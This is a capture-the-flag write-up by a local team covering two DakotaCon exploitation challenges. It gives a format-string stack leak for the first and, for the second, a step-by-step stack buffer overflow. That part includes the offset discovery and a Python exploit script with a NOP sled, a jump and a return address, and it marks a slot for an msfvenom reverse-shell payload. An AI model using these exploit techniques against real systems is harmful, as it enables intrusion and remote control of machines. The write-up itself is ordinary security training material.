Local CTF team over at SecDSM tied for 2nd place on this one. Thanks to the great folks over at DakotaCon for settings this up.

Below are some raw outputs of how we accomplished each task. It’s not a very detailed write up as of yet, but it may be edited in the future, especially when I get to the RE challenges.

Exploit 100

This one was a simple format string exploit that opened a flag file and saved it on the stack. Because of this, we are able to read the flag from the stack.

[email protected]:~/DakotaCon/Exploit100# python -c'print "%08x" * 400' | nc 3268
Enter your message: 00000064f76fd5a0fff5a248f7732a7400000001f77012e809e97008757065526c6261746d6552657948786974617264000a6465000000c2f75dc76bfff5a23efff5a33c78383025783830257838302578383025783830257838302578383025
[email protected]:~/DakotaCon/Exploit100#
[email protected]:~/DakotaCon/Exploit100# 
[email protected]:~/DakotaCon/Exploit100# echo "00000064f77875a0ff8af148f77bca7400000001f778b2e809fde008757065526c6261746d6552657948786974617264000a6465000000c2f766676bff8af13eff8af23c78383025783830257838302578383025783830257838302578383025" | fold -w8 > strings.txt && for i in $(tac strings.txt); do echo $i | xxd -r -p; done
detardyHximeRelbatupeR	??x???{?t???H?
[email protected]:~/DakotaCon/Exploit100# echo detardyHximeRelbatupeR | rev

Exploit 250

[email protected]:~/DakotaCon/Exploit250# ./exploit250 
Enter your message: string

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 100' | ./exploit250 
Enter your message: 0xbf84f8b0
Segmentation fault

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100 > input.txt
[email protected]:~/DakotaCon/Exploit250# 

[email protected]:~/DakotaCon/Exploit250# gdb -q ./exploit250
Reading symbols from ./exploit250...(no debugging symbols found)...done.

gdb-peda$ r < input.txt
Starting program: /root/DakotaCon/Exploit250/exploit250 < input.txt
Enter your message: 0xbffff550

EIP: 0x63413563 ('c5Ac')
Stopped reason: SIGSEGV
0x63413563 in ?? ()

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 100 -q 0x63413563
[*] Exact match at offset 76
[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde"' > input.txt
[email protected]:~/DakotaCon/Exploit250# 

Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, <incomplete sequence \336>

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde" + "C" * 400' > input.txt

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, "οΎ­\336", 'C' <repeats 120 times>...

from struct import *

payload = "\xeb\x08"    # Short Jump

ret = pack("<L", 0xbffff550)    # Memory location of our NOP sled
offset = 76

sploit = "\x90"*(offset - len(payload))
sploit += payload
sploit += ret

payload =  "\x90" * 20
payload += # msfvenom generated payload with linux/x86/shell_reverse_tcp

# [74 NOP][Short Jump][Return][20 NOP][PAYLOAD]
sploit += payload

print sploit